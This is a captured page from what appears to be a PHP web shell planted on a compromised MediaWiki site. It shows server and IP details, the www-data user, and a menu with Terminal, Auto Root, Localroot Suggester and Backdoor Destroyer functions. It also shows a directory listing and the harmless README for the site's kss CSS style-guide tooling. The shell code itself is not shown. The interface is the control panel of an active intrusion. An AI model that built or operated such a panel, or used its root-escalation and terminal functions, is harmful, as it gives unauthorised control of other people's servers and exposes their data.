Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
docs /
kss /
Delete
Unzip
Name
Size
Permission
Date
Action
scripts
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
styleguide-template
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
Makefile
795
B
-rw-r--r--
2016-11-28 20:20
README.txt
846
B
-rw-r--r--
2016-11-28 20:20
styleGuideModules.txt
202
B
-rw-r--r--
2016-11-28 20:20
Save
Rename
The Makefile, package.json, scripts, styleguide-template, and mediawiki.ui/styleguide.md files and directories here and in resources/src/mediawiki.ui/ support the automatic generation of CSS documentation from the source LESS files using kss for node.js, https://github.com/kneath/kss To build and open in your web browser, run: MEDIAWIKI_LOAD_URL=mediawiki_hostname/w/load.php make kssopen For example, MEDIAWIKI_LOAD_URL=1.2.3.4/w/load.php make kssopen If MediaWiki is running on localhost, you can omit MEDIAWIKI_LOAD_URL. To rebuild without opening the web browser, run: MEDIAWIKI_LOAD_URL=mediawiki_hostname/w/load.php make When modifying styleGuideModules.txt, keep the list in strict alphabetical order (with no extra formatting), so CSS loads in the same order as ResourceLoader's addModuleStyles does; this can affect rendering.